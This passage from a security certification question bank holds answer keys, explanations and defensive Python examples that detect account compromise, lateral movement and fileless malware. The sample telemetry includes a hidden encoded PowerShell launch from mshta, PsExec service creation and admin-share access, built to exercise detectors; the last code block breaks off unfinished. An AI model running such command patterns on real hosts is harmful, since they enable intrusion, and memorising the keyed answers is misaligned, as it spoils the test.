Option A is correct because the SSO gateway is internet-facing, has a CVSS 8.8 with public exploit code, and an authentication-bypass impact. This combination means an attacker can gain unauthorized access to all federated applications without credentials, representing a critical risk that must be remediated immediately.

Exam trap

The trap here is that candidates often prioritize the highest CVSS score (9.8) without considering compensating controls like network isolation, lack of exploit code, or data sensitivity, which can drastically reduce real-world risk.

651
MCQ (easy)

A user reports a ransomware note on one department file share, but other departments are still working normally. What is the best first containment action?

A. Shut down the entire company network immediately.
B. Disconnect the affected file share or server from the network.
C. Delete the ransom note and wait to see whether the problem returns.
D. Restore the share immediately before checking what caused the incident.
Answer: B

Isolating the affected system is the best first containment step because it helps stop the malware from spreading while preserving the rest of the environment. The goal in early incident response is to reduce impact quickly without causing unnecessary downtime. Once contained, responders can investigate scope, preserve evidence, and begin eradication and recovery.

Why this answer

Option B is correct because the immediate priority in a ransomware incident is to contain the threat by isolating the affected system to prevent lateral movement. Disconnecting the file share or server from the network stops the ransomware from encrypting additional files or spreading to other departments via SMB or other protocols. This aligns with the NIST SP 800-61 containment strategy, which emphasizes rapid isolation without disrupting unaffected systems.

Exam trap

The trap here is that candidates may choose Option A (full network shutdown) because they think it is the safest action, but the exam emphasizes precise, least-disruptive containment that preserves evidence and limits business impact.

How to eliminate wrong answers

Option A is wrong because shutting down the entire company network is overly disruptive, may destroy volatile evidence (e.g., memory-resident malware), and is unnecessary when only one department is affected. Option C is wrong because deleting the ransom note does not remove the ransomware executable or prevent further encryption; it ignores the active threat and wastes critical response time. Option D is wrong because restoring the share without first containing the incident risks immediate re-infection, as the ransomware may still be active on the network or the restored files could be re-encrypted.

652
MCQ (medium)

A business owner asks whether to proceed with a medium-risk issue on an internal reporting system. The vulnerability is unlikely to be exploited because the system is reachable only from a segmented admin network, and no sensitive data is stored there. The owner wants to postpone remediation until the next planned upgrade window. Which risk treatment is being chosen?

A. Risk avoidance, because the system will be upgraded later.
B. Risk acceptance, because the business is choosing to live with the remaining risk for now.
C. Risk transfer, because the upgrade window shifts responsibility to the vendor.
D. Risk escalation, because the issue is being sent to the help desk for tracking.
Answer: B

This is the correct treatment because leadership is knowingly accepting the residual risk until the planned upgrade.

Why this answer

Option B is correct because risk acceptance is the deliberate decision to acknowledge and tolerate a risk without immediate remediation. In this scenario, the business owner understands the vulnerability is low-likelihood (segmented admin network, no sensitive data) and chooses to postpone fixing it until the next planned upgrade, thereby accepting the residual risk for that period.

Exam trap

Cisco often tests the distinction between risk acceptance and risk avoidance, where candidates mistakenly think postponing remediation equals avoidance rather than a conscious decision to live with the risk temporarily.

How to eliminate wrong answers

Option A is wrong because risk avoidance would mean eliminating the risk entirely (e.g., removing the system or blocking all access), not merely postponing remediation to a later upgrade. Option C is wrong because risk transfer shifts financial liability to a third party (e.g., purchasing cyber insurance or outsourcing), not delaying an internal fix. Option D is wrong because risk escalation involves formally notifying higher management or a risk committee to decide on a response, not simply sending a ticket to the help desk for tracking.

653
MCQ (medium)

A SIEM correlates three failed MFA prompts for a payroll admin account from one IP, a successful login two minutes later from the same IP, and a new mailbox forwarding rule to an external address. What is the best immediate action?

A. Reset the password and leave the account enabled so the user can keep working.
B. Disable the account and revoke active sessions and tokens.
C. Delete the forwarding rule and monitor the account for a few hours.
D. Wait for the user to confirm the login before taking any action.
Answer: B

This is the best immediate containment step because the signs strongly indicate account compromise. Disabling the account stops new authentication, while revoking sessions and tokens cuts off any already-established access that could continue to act as the user. That combination contains the incident quickly and limits further mailbox manipulation, data theft, or privilege misuse while the team investigates logs and confirms scope.

Why this answer

Option B is correct because the combination of failed MFA prompts followed by a successful login and immediate creation of an external mailbox forwarding rule is a classic indicator of account compromise (e.g., adversary-in-the-middle or token theft). Disabling the account and revoking active sessions and tokens stops the attacker from maintaining access and prevents further data exfiltration via the forwarding rule, which is the most urgent containment step in incident response.

Exam trap

CompTIA often tests the misconception that deleting the malicious artifact (forwarding rule) is sufficient, when in reality the priority is to contain the compromised account by disabling it and revoking all sessions.

How to eliminate wrong answers

Option A is wrong because resetting the password alone does not invalidate active sessions or tokens, allowing the attacker to continue using existing authenticated sessions. Option C is wrong because deleting only the forwarding rule without disabling the account leaves the attacker with continued access to the mailbox and the ability to recreate the rule or perform other malicious actions. Option D is wrong because waiting for user confirmation delays containment, giving the attacker more time to exfiltrate data or establish persistence, and the user may not be aware of the compromise.
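The correlation the SIEM performs in this scenario, written out as a rule. This is an added example for this page, not code from the exam bank or any SIEM product; the event records, user names, IP addresses, mail domains and the "corp.example" internal domain are all constructed. The rule fires only when the full sequence is present: a run of MFA failures from one source address, a successful login from that same address inside the window, and then a new inbox rule forwarding to an address outside the company. A user who fumbles MFA once and forwards to a colleague does not trigger it.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample SIEM events for the demonstration (not taken from any real system).
EVENTS = [
    {"ts": "2024-05-01T09:00:05", "user": "payroll-admin", "src_ip": "203.0.113.7", "type": "mfa_failed"},
    {"ts": "2024-05-01T09:00:20", "user": "payroll-admin", "src_ip": "203.0.113.7", "type": "mfa_failed"},
    {"ts": "2024-05-01T09:00:41", "user": "payroll-admin", "src_ip": "203.0.113.7", "type": "mfa_failed"},
    {"ts": "2024-05-01T09:02:30", "user": "payroll-admin", "src_ip": "203.0.113.7", "type": "login_success"},
    {"ts": "2024-05-01T09:03:10", "user": "payroll-admin", "src_ip": "203.0.113.7",
     "type": "inbox_rule_created", "forward_to": "drop@mail-example.net"},
    # Benign: one mistyped MFA code, a normal login, and a forward to an in-house address.
    {"ts": "2024-05-01T10:00:00", "user": "jsmith", "src_ip": "198.51.100.4", "type": "mfa_failed"},
    {"ts": "2024-05-01T10:00:30", "user": "jsmith", "src_ip": "198.51.100.4", "type": "login_success"},
    {"ts": "2024-05-01T10:01:00", "user": "jsmith", "src_ip": "198.51.100.4",
     "type": "inbox_rule_created", "forward_to": "team@corp.example"},
]

INTERNAL_DOMAINS = {"corp.example"}  # constructed: the company's own mail domain(s)


def _parse(ts):
    return datetime.fromisoformat(ts)


def is_external(address, internal_domains=INTERNAL_DOMAINS):
    """True when the forwarding target's domain is not one of ours."""
    return address.rsplit("@", 1)[-1].lower() not in internal_domains


def correlate(events, min_failures=3, window=timedelta(minutes=10)):
    """Return one alert per user whose events match: >= min_failures MFA failures
    from a single source IP, then login_success from that IP within `window`,
    then an inbox rule forwarding externally within `window` of that login."""
    per_user = defaultdict(list)
    for event in events:
        per_user[event["user"]].append(event)

    alerts = []
    for user, user_events in per_user.items():
        user_events.sort(key=lambda e: _parse(e["ts"]))
        failures = defaultdict(list)  # src_ip -> timestamps of MFA failures
        suspicious_login = None       # (timestamp, src_ip) once the failure run is seen
        for event in user_events:
            t = _parse(event["ts"])
            kind = event["type"]
            if kind == "mfa_failed":
                failures[event["src_ip"]].append(t)
            elif kind == "login_success":
                recent = [f for f in failures[event["src_ip"]] if t - f <= window]
                if len(recent) >= min_failures:
                    suspicious_login = (t, event["src_ip"])
            elif kind == "inbox_rule_created" and suspicious_login:
                login_t, login_ip = suspicious_login
                if (event["src_ip"] == login_ip and t - login_t <= window
                        and is_external(event.get("forward_to", ""))):
                    alerts.append({
                        "user": user,
                        "src_ip": login_ip,
                        "forward_to": event["forward_to"],
                        # Option B from the question: contain the account, not just the artifact.
                        "action": "disable account; revoke active sessions and tokens",
                    })
                    suspicious_login = None
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

The `action` field is deliberately the containment step rather than "delete the rule": the explanation above is that removing the forwarding rule alone leaves the attacker's session intact, so the rule's output should drive the account disable and token revocation.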

654
MCQ (medium)

A company wants to stop employees from running unauthorized tools downloaded from the internet on managed Windows laptops, but still allow approved internal apps and vendor-updated software. Which control is best?

A. Application control using an allowlist for approved executables and publishers.
B. Full-disk encryption on every laptop before deployment.
C. A stronger screen-lock timeout and automatic logoff policy.
D. A firmware password for the BIOS without any other endpoint restrictions.
Answer: A

Allowlisting blocks unapproved software while still permitting known-good internal and vendor-signed applications.

Why this answer

Application control with an allowlist (also known as whitelisting) is the correct choice because it explicitly defines which executables, scripts, and publishers are permitted to run on managed Windows laptops. This prevents unauthorized tools downloaded from the internet from executing, while allowing approved internal apps and vendor-updated software that match the allowlist criteria. Technologies like Windows Defender Application Control (WDAC) or AppLocker enforce this by checking file hashes, publisher signatures, or path rules at runtime.

Exam trap

The trap here is that candidates often confuse data-at-rest protection (encryption) or session management (screen lock) with application execution control, mistakenly thinking they can prevent unauthorized software from running, when in fact they address entirely different security domains.

How to eliminate wrong answers

Option B is wrong because full-disk encryption (e.g., BitLocker) protects data at rest from unauthorized access if the laptop is lost or stolen, but it does not control which applications can run on the device; it has no mechanism to block execution of unauthorized tools. Option C is wrong because a stronger screen-lock timeout and automatic logoff policy addresses session security and unauthorized physical access, but it does not prevent a user from running downloaded executables while logged in; it has no application execution control capability.

655
MCQ (medium)

Employees authenticate once to a corporate portal and then open the help desk, payroll, and documentation apps without logging in again. The apps rely on tokens from the company's identity provider instead of storing separate passwords. What is being implemented?

A. Password synchronization between every application in the suite.
B. Federated single sign-on using the corporate identity provider.
C. Shared guest accounts for all employees on the portal.
D. Split tunneling through a VPN to speed up application access.
Answer: B

Correct. Federated SSO lets the identity provider authenticate the user once and then issue tokens or assertions that other trusted applications accept. This improves usability while reducing password sprawl and lowering the number of credentials stored by individual services. It is a standard enterprise pattern for accessing multiple apps with one login session.

Why this answer

The scenario describes single sign-on (SSO) where the corporate identity provider (IdP) issues tokens (e.g., SAML assertions, OIDC ID tokens) after initial authentication. The help desk, payroll, and documentation apps are configured as service providers that trust the IdP, so they accept the token instead of requiring separate credentials. This is federated SSO because the apps rely on a central identity provider rather than sharing password databases or synchronizing passwords.

Exam trap

The trap here is that candidates confuse 'federated single sign-on' with 'password synchronization' (Option A), because both reduce the number of logins, but federation uses tokens and trust relationships, not shared or synced passwords.

How to eliminate wrong answers

Option A is wrong because password synchronization would replicate the same password across each application's local credential store, which is not what occurs—the apps never receive or store the user's password; they rely on tokens from the IdP. Option C is wrong because shared guest accounts would violate individual accountability and audit trails, and the scenario describes employees authenticating individually, not using a common account. Option D is wrong because split tunneling is a VPN routing technique that allows some traffic to bypass the VPN tunnel for performance; it has nothing to do with authentication or token-based access to applications.

656
MCQ (medium)

NetFlow shows one user workstation making authenticated SMB and WinRM connections to more than 40 internal hosts within 15 minutes, starting shortly after the user opened a spreadsheet attachment. No approved admin tool was running on the device. What is the best initial response?

A. Treat the traffic as normal because the workstation used valid credentials
B. Isolate the workstation and begin investigating for credential compromise or lateral movement
C. Increase the DHCP lease time to reduce network noise
D. Block all SMB and WinRM traffic across the entire enterprise
Answer: B

Rapid east-west access from a single workstation is a strong sign of compromise, so containment and investigation should start immediately.

Why this answer

The sudden burst of authenticated SMB and WinRM connections from a single workstation to over 40 internal hosts immediately after opening a spreadsheet attachment is a classic indicator of lateral movement using stolen credentials. Since no approved admin tool was running, this behavior strongly suggests the user's credentials have been compromised, likely via a macro or exploit in the attachment, and an attacker is using those protocols to move laterally. Isolating the workstation stops the attack in progress and preserves evidence for forensic investigation.

Exam trap

The trap here is that candidates see 'authenticated' and assume the traffic is legitimate, missing that attackers use valid stolen credentials to authenticate, making authentication alone an unreliable indicator of safety.

How to eliminate wrong answers

Option A is wrong because valid credentials do not make the traffic normal; attackers commonly use stolen credentials to authenticate and move laterally, so authentication alone does not indicate legitimate activity. Option C is wrong because increasing the DHCP lease time does not address the security incident; it would only extend IP address assignments and has no effect on SMB/WinRM lateral movement. Option D is wrong because blocking all SMB and WinRM traffic enterprise-wide would disrupt legitimate administrative and file-sharing operations, and is an overly broad, reactive measure that does not isolate the specific compromised host or investigate the root cause.

657
MCQ (hard)

Based on the exhibit, what is the best fix so role changes take effect promptly without waiting for token expiration?

A. Increase the token lifetime so users reauthenticate less often during the workday.
B. Perform authorization checks against current directory data on each privileged request.
C. Store the JWT in a browser cookie so it refreshes automatically when roles change.
D. Disable MFA and rely only on the role claim inside the token.
Answer: B

This is the best fix because the problem is stale authorization, not failed authentication. The app is trusting a role claim that was correct at sign-in but became outdated after the HR change. Checking current directory data, or re-evaluating authorization on each sensitive action, ensures access follows the user's current status instead of an old token snapshot.

Why this answer

Option B is correct because performing authorization checks against current directory data (e.g., via LDAP or a policy decision point) on each privileged request ensures that role changes are enforced immediately, regardless of JWT token lifetime. This decouples authentication (token validity) from authorization (current role membership), allowing dynamic updates without waiting for token expiration or reauthentication.

Exam trap

The trap here is that candidates assume storing a JWT in a cookie or increasing token lifetime will somehow make role changes take effect, when in fact neither alters the static nature of the token's claims without a reissue or runtime authorization check.

How to eliminate wrong answers

Option A is wrong because increasing token lifetime would delay the effect of role changes even further, as users would hold stale tokens for longer periods. Option C is wrong because storing a JWT in a browser cookie does not automatically refresh its claims when roles change; the token itself remains unchanged until a new one is issued, and cookies do not trigger reauthorization. Option D is wrong because disabling MFA weakens security and does not address the core issue of stale role claims; the role claim inside the token would still be static until the token expires or is refreshed.
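The stale-authorization problem and the Option B fix, shown in code. This is an added example for this page, not code from the exam bank; the HS256 signing key, the user "alice", the "payroll-approver" role and the dictionary standing in for the directory are all constructed. `authorize_from_token` trusts the role snapshot baked into the JWT at sign-in; `authorize_from_directory` still verifies the token (that is the authentication step) but decides the role against the live directory record on each privileged request, so an HR change takes effect immediately even though the token has not expired.

```python
import base64
import hashlib
import hmac
import json

# Constructed signing key for the demonstration only.
SECRET = b"constructed-demo-signing-key"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(subject, roles, now, lifetime=3600):
    """Mint an HS256 JWT whose 'roles' claim is a snapshot taken at sign-in."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(
        {"sub": subject, "roles": list(roles), "iat": now, "exp": now + lifetime}
    ).encode())
    sig = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_token(token, now):
    """Authentication only: check signature and expiry, then return the claims."""
    header, payload, sig = token.split(".")
    expected = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64url(sig)):
        raise ValueError("invalid signature")
    claims = json.loads(_unb64url(payload))
    if now >= claims["exp"]:
        raise ValueError("token expired")
    return claims


def authorize_from_token(token, required_role, now):
    """The pattern the question describes: trust the role snapshot inside the token.
    It stays wrong until the token expires or is reissued."""
    return required_role in verify_token(token, now)["roles"]


def authorize_from_directory(token, required_role, now, directory):
    """Option B: the token proves who is calling, but the role decision is made
    against the current directory record on every privileged request."""
    claims = verify_token(token, now)
    current_roles = directory.get(claims["sub"], {}).get("roles", [])
    return required_role in current_roles


def demo():
    """Return ((token_check, directory_check) before the HR change, the same after)."""
    directory = {"alice": {"roles": ["payroll-approver"]}}  # constructed directory record
    t0 = 1_700_000_000
    token = issue_token("alice", directory["alice"]["roles"], t0)
    before = (authorize_from_token(token, "payroll-approver", t0 + 60),
              authorize_from_directory(token, "payroll-approver", t0 + 60, directory))
    directory["alice"]["roles"] = []  # HR removes the role while the token is still valid
    after = (authorize_from_token(token, "payroll-approver", t0 + 120),
             authorize_from_directory(token, "payroll-approver", t0 + 120, directory))
    return before, after


if __name__ == "__main__":
    print(demo())  # expected ((True, True), (True, False))
```

In a real deployment the directory lookup would be an LDAP query or a call to a policy decision point, as the explanation says, usually with a short-lived cache so that the check does not hit the directory on every request; the point is that the cache lifetime, not the token lifetime, bounds how long a revoked role lingers.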

658
MCQ (medium)

A SOC analyst confirms that a critical Linux virtual machine is making outbound connections to a known malicious IP address. The application owner says the VM hosts a revenue system that cannot be powered off without causing a major outage. What is the best containment action?

A. Shut down the VM immediately to stop all malicious activity.
B. Isolate the VM at the network layer while keeping it powered on.
C. Wait for the next maintenance window before taking action.
D. Reimage the VM from a known-good template immediately.
Answer: B

This reduces further attacker communication and spread while preserving the system state for investigation and minimizing business disruption.

Why this answer

Option B is correct because network isolation (e.g., applying a firewall ACL or moving the VM to a quarantine VLAN) stops outbound malicious traffic while keeping the revenue-critical system powered on and available for forensic analysis. This balances security containment with business continuity, as shutting down the VM (Option A) would cause a major outage, and waiting (Option C) would allow continued data exfiltration or lateral movement.

Exam trap

The trap here is that candidates may assume immediate shutdown is always the best containment action, but the exam tests the ability to prioritize business continuity while still containing the threat through network-layer isolation.

How to eliminate wrong answers

Option A is wrong because immediately shutting down the VM would cause a major outage for the revenue system, violating the requirement to avoid disruption, and it would destroy volatile forensic evidence (e.g., memory, active connections). Option C is wrong because waiting for the next maintenance window allows the malicious outbound connections to continue, risking data exfiltration, further compromise, or lateral movement to other systems.

659
MCQ (medium)

Based on the exhibit, which finding is the best candidate for immediate remediation or emergency mitigation?

A. VPN-EDGE01, because a critical internet-facing RCE with public exploit code has the highest risk.
B. FILE-02, because file servers often affect many users and should always come before perimeter systems.
C. TEST-VM-17, because any high-severity issue deserves the fastest response regardless of exposure.
D. PRINTER-3F, because default credentials are the easiest issue to exploit and therefore the most dangerous.
Answer: A

VPN-EDGE01 combines severity, exposure, and exploit availability. A critical remote code execution flaw on an internet-facing device is the most urgent because attackers can reach it directly from outside the organization. Public proof-of-concept code further lowers the effort needed to exploit it. When prioritizing vulnerabilities, this combination usually receives immediate remediation or emergency mitigation.

Why this answer

Option A is correct because VPN-EDGE01 is an internet-facing device with a critical remote code execution (RCE) vulnerability that has public exploit code available. This combination of high severity, network exposure, and weaponized exploit makes it the highest risk and most urgent for immediate remediation or emergency mitigation.

Exam trap

The trap here is that candidates may prioritize by severity alone (high vs. critical) or by ease of exploitation (default credentials), ignoring the critical factor of network exposure and the presence of public exploit code, which together create the highest immediate risk.

How to eliminate wrong answers

Option B is wrong because file servers, while affecting many users, do not inherently present a higher risk than an internet-facing device with a critical RCE; prioritizing by user count over exposure and exploitability is a common prioritization error. Option C is wrong because a high-severity issue on a non-internet-facing test VM (TEST-VM-17) is less urgent than a critical RCE on an internet-facing edge device, as the test VM has limited exposure and lower likelihood of exploitation. Option D is wrong because default credentials on a printer (PRINTER-3F), while easily exploitable, typically have limited impact compared to a critical RCE on a perimeter VPN gateway that could lead to full network compromise.

660
Matching (medium)

Match each data example to the most appropriate classification label.
1. A public marketing flyer approved for external posting.
2. An internal org chart and office directory meant only for employees.
3. A customer case file with contact details and order history.
4. A vault export containing API keys and encryption secrets.


Concepts
Public
Internal
Confidential
Restricted

Why these pairings

These matches follow a typical data classification scheme: Public for non-sensitive info, Internal for company-only data, Confidential for customer PII, and Restricted for highly sensitive secrets.

661
MCQ (medium)

After a routine dependency update, a development team notices that the customer portal begins making outbound connections to an unfamiliar domain during startup. The domain is not part of the application design, and the behavior started immediately after the third-party library was updated. Which threat is most likely?

A. Supply-chain compromise
B. Evil twin access point
C. Bluetooth pairing abuse
D. DNS poisoning on the client network
Answer: A

A compromised dependency can introduce malicious behavior through trusted software updates or packages.

Why this answer

The scenario describes a supply-chain compromise, where a trusted third-party library has been maliciously altered to include unauthorized outbound connections. This is a classic software supply-chain attack, as the dependency update introduced code that phones home to an unfamiliar domain, indicating the library's integrity was compromised before or during distribution.

Exam trap

The trap here is that candidates may confuse supply-chain compromise with DNS poisoning, because both involve unexpected outbound connections, but DNS poisoning would affect all network traffic and not be tied to a specific library update.

How to eliminate wrong answers

Option B (Evil twin access point) is wrong because it involves a rogue Wi-Fi access point impersonating a legitimate one to intercept network traffic, which is unrelated to a dependency update triggering outbound connections. Option C (Bluetooth pairing abuse) is wrong because it exploits Bluetooth vulnerabilities for unauthorized access or data exfiltration, not relevant to a third-party library update causing outbound connections. Option D (DNS poisoning on the client network) is wrong because it corrupts DNS cache to redirect traffic to malicious sites, but the behavior started immediately after the library update and targets a specific domain, not a broad redirection of all traffic.

662
MCQ (medium)

SIEM alerts show one workstation making SMB connections to 30 internal hosts within 10 minutes, followed by remote service creation and repeated access attempts to admin shares. The workstation also begins authenticating with several privileged accounts. What is the most likely activity?

A. A distributed denial-of-service attack launched from a compromised internal host.
B. DNS tunneling used to exfiltrate data through allowed name-resolution traffic.
C. ARP spoofing to redirect local traffic at the network layer.
D. Lateral movement after credential compromise or endpoint takeover.
Answer: D

The workstation is behaving like an attacker foothold that is probing internal systems, using administrative shares, and attempting remote service creation. Those are strong signs of lateral movement after credentials or the device itself have been compromised. The privileged-account authentication attempts also suggest the attacker is trying to expand access and reach higher-value systems inside the environment.

Why this answer

The sequence of SMB connections to many internal hosts, followed by remote service creation and repeated access attempts to admin shares, combined with authentication using privileged accounts, is the classic pattern of lateral movement. This indicates the attacker has already compromised the workstation (endpoint takeover) or obtained valid credentials and is now using SMB and PsExec-like techniques to move laterally across the network, escalate privileges, and establish persistence.

Exam trap

The trap here is that candidates may confuse lateral movement with a DDoS attack because of the many outbound connections, but the key differentiator is the use of admin shares and privileged account authentication, which are hallmarks of post-exploitation lateral movement, not volumetric attacks.

How to eliminate wrong answers

Option A is wrong because a DDoS attack would generate massive traffic to overwhelm a target, not involve targeted SMB connections to admin shares or privileged account authentication. Option B is wrong because DNS tunneling exfiltrates data by encoding it in DNS queries/responses, not by making SMB connections or creating remote services. Option C is wrong because ARP spoofing operates at Layer 2 to intercept traffic on a local subnet, not to perform SMB-based lateral movement or authenticate with multiple privileged accounts across many hosts.
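The pattern in this question can be turned into a correlation rule. The block below is an added example written for this page, not code from any SIEM vendor: it builds a constructed set of SIEM-style events (field names, hostnames, account names, the 10-minute window and the thresholds are all assumptions), measures how many distinct SMB targets each source reaches inside the window, and only raises a finding when that fan-out coincides with admin-share access, remote service creation and logons by more than one privileged account. A fan-out spike on its own would also match a vulnerability scanner or a backup job; the combination is what separates lateral movement from noise.

```python
"""Lateral-movement triage over SIEM-style events (added example).

All events below are constructed for illustration; the field names, the
10-minute window and the thresholds are assumptions, not a vendor schema.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
FANOUT_THRESHOLD = 20                     # distinct SMB targets from one source inside WINDOW
ADMIN_SHARES = {"ADMIN$", "C$"}           # hidden administrative shares
PRIVILEGED = {"DA-jsmith", "svc_backup", "helpdesk_admin"}   # hypothetical privileged accounts


def build_events():
    """Constructed sample: ws-017 behaves like the workstation in the question,
    fs-01 is a benign file server talking to a few hosts over the morning."""
    base = datetime(2024, 3, 4, 9, 0, 0)
    ev = []
    for i in range(30):                                   # 30 targets in under 10 minutes
        ev.append({"ts": base + timedelta(seconds=20 * i), "type": "smb_connect",
                   "src": "ws-017", "dst": f"srv-{i:03d}",
                   "share": "ADMIN$" if i % 2 == 0 else "C$", "user": "jdoe"})
    for i in range(5):                                    # PsExec-style remote service installs
        ev.append({"ts": base + timedelta(minutes=6, seconds=30 * i), "type": "service_create",
                   "src": "ws-017", "dst": f"srv-{i:03d}", "user": "DA-jsmith",
                   "service": "PSEXESVC"})
    for u in ("DA-jsmith", "svc_backup", "helpdesk_admin"):
        ev.append({"ts": base + timedelta(minutes=8), "type": "logon",
                   "src": "ws-017", "dst": "srv-001", "user": u})
    for i in range(3):                                    # benign: one host per hour
        ev.append({"ts": base + timedelta(hours=i), "type": "smb_connect",
                   "src": "fs-01", "dst": f"ws-{i:03d}", "share": "data", "user": "backup"})
    return sorted(ev, key=lambda e: e["ts"])


def max_fanout(events, src):
    """Largest number of distinct SMB destinations reached by src within any WINDOW."""
    conns = [e for e in events if e["type"] == "smb_connect" and e["src"] == src]
    best = 0
    for i, first in enumerate(conns):
        end = first["ts"] + WINDOW
        best = max(best, len({c["dst"] for c in conns[i:] if c["ts"] <= end}))
    return best


def assess(events):
    """Return one finding per source host that shows the full pattern: fan-out to
    many hosts, admin-share use, remote service creation and logons with at least
    two privileged accounts. Any one signal alone is not enough to alert on."""
    findings = {}
    for src in sorted({e["src"] for e in events}):
        mine = [e for e in events if e["src"] == src]
        fanout = max_fanout(events, src)
        admin_hits = sum(1 for e in mine
                         if e["type"] == "smb_connect" and e.get("share") in ADMIN_SHARES)
        services = sum(1 for e in mine if e["type"] == "service_create")
        priv = {e["user"] for e in mine if e["type"] == "logon" and e["user"] in PRIVILEGED}
        if fanout >= FANOUT_THRESHOLD and admin_hits and services and len(priv) >= 2:
            findings[src] = {"fanout": fanout, "admin_share_hits": admin_hits,
                             "services_created": services,
                             "privileged_accounts": sorted(priv)}
    return findings


if __name__ == "__main__":
    for host, detail in assess(build_events()).items():
        print(f"{host}: {detail}")
```

Running it reports only ws-017; fs-01 never exceeds one distinct target per window and is not flagged. In production the event types would map to Windows Security event 5140 (share accessed), System event 7045 (service installed) and Security event 4624 (logon), and the privileged-account set would come from the directory rather than a hard-coded list.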

663
MCQmedium

An EDR console shows `mshta.exe` launching `powershell.exe` from a user profile directory, followed by a script that never writes a new executable to disk. Minutes later, the host begins making regular outbound HTTPS connections to an unfamiliar IP address. What type of malware behavior is most likely being observed?

A.Fileless attack
B.Ransomware
C.Worm
D.Rootkit
AnswerA

Fileless attacks rely on built-in tools and memory-resident activity instead of dropping a traditional executable on disk. The use of mshta and PowerShell is a common indicator.

Why this answer

The EDR console shows mshta.exe (a Microsoft binary for executing HTML Applications) launching PowerShell from a user profile directory, followed by a script that never writes a new executable to disk. This is classic fileless malware behavior, where the malicious payload runs entirely in memory (e.g., via PowerShell or .NET reflection) without dropping a file, making it harder for traditional signature-based antivirus to detect. The subsequent outbound HTTPS connections to an unfamiliar IP indicate command-and-control (C2) communication, consistent with a fileless attack whose payload lives only in memory; if such malware persists at all, it typically does so through a registry entry, a WMI subscription, or a scheduled task rather than a dropped binary.

Exam trap

The trap here is that candidates may confuse 'fileless' with 'no malware at all' or think it must involve a rootkit, but the key indicator is the absence of a file write combined with in-memory script execution via trusted system binaries.

How to eliminate wrong answers

Option B (Ransomware) is wrong because ransomware typically encrypts files and demands payment, often writing a ransom note to disk and modifying file extensions; the described behavior of never writing an executable to disk and making outbound HTTPS connections is more indicative of a fileless C2 channel, not encryption or extortion. Option C (Worm) is wrong because worms self-propagate across networks without user interaction, often exploiting vulnerabilities or using removable media; the scenario focuses on a single host's in-memory execution and C2 traffic, not lateral movement or replication. Option D (Rootkit) is wrong because rootkits are designed to hide their presence by modifying the operating system kernel or system calls, often persisting via drivers or bootkits; the described behavior of launching PowerShell from mshta.exe and making outbound connections is a user-mode fileless attack, not a kernel-level stealth mechanism.
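The three clues in the question (a script host spawning a shell from a user profile path, no executable written, and an outbound beacon shortly after) can be expressed as one detection rule over EDR process, file and network events. The block below is an added example for this page, not code from any EDR product: the telemetry layout, process IDs, paths and the 203.0.113.77 address are constructed, and the 15-minute beacon window is an assumption. The encoded command in the sample is the UTF-16LE base64 of "IEX", the usual prefix of an in-memory download cradle. A second, deliberately similar chain that drops an executable is included to show that the "no file write" check is what distinguishes fileless execution from an ordinary dropper.

```python
"""Flag a fileless execution chain in constructed EDR telemetry (added example).

The event layout, process IDs, paths and IP are assumptions made for this
illustration; real EDR schemas differ but carry the same fields.
"""
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
EXEC_EXT = (".exe", ".dll", ".scr")
NET_WINDOW = timedelta(minutes=15)        # beacon must start this soon after the shell spawns


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def build_telemetry():
    """Constructed events: pid 4188 is the in-memory chain from the question,
    pid 5210 is a look-alike chain that drops a binary, pid 6001 is benign."""
    return [
        {"ts": "2024-03-04 08:30:00", "type": "process", "pid": 3311, "ppid": 1, "image": "explorer.exe",
         "cmd": "explorer.exe", "cwd": r"C:\Windows"},
        # Chain 1: mshta from a user profile path spawns hidden, encoded PowerShell ("IEX")
        {"ts": "2024-03-04 09:14:02", "type": "process", "pid": 4120, "ppid": 3311, "image": "mshta.exe",
         "cmd": r"mshta.exe C:\Users\jdoe\AppData\Local\Temp\invoice.hta", "cwd": r"C:\Users\jdoe\AppData\Local\Temp"},
        {"ts": "2024-03-04 09:14:03", "type": "process", "pid": 4188, "ppid": 4120, "image": "powershell.exe",
         "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgA", "cwd": r"C:\Users\jdoe"},
        {"ts": "2024-03-04 09:14:05", "type": "file", "pid": 4188, "path": r"C:\Users\jdoe\AppData\Local\Temp\ps.log"},
        {"ts": "2024-03-04 09:17:40", "type": "network", "pid": 4188, "dst": "203.0.113.77", "port": 443},
        {"ts": "2024-03-04 09:18:40", "type": "network", "pid": 4188, "dst": "203.0.113.77", "port": 443},
        # Chain 2: same parent/child pair, but it writes an executable (a dropper, not fileless)
        {"ts": "2024-03-04 10:02:00", "type": "process", "pid": 5200, "ppid": 3311, "image": "mshta.exe",
         "cmd": r"mshta.exe C:\Users\jdoe\Downloads\update.hta", "cwd": r"C:\Users\jdoe\Downloads"},
        {"ts": "2024-03-04 10:02:01", "type": "process", "pid": 5210, "ppid": 5200, "image": "powershell.exe",
         "cmd": "powershell.exe -File stage.ps1", "cwd": r"C:\Users\jdoe\Downloads"},
        {"ts": "2024-03-04 10:02:09", "type": "file", "pid": 5210, "path": r"C:\Users\jdoe\Downloads\svchost.exe"},
        {"ts": "2024-03-04 10:03:00", "type": "network", "pid": 5210, "dst": "203.0.113.77", "port": 443},
        # Benign: Explorer launches an admin script that talks to an internal host over WinRM
        {"ts": "2024-03-04 11:00:00", "type": "process", "pid": 6001, "ppid": 3311, "image": "powershell.exe",
         "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1", "cwd": r"C:\Scripts"},
        {"ts": "2024-03-04 11:00:05", "type": "network", "pid": 6001, "dst": "10.10.0.5", "port": 5985},
    ]


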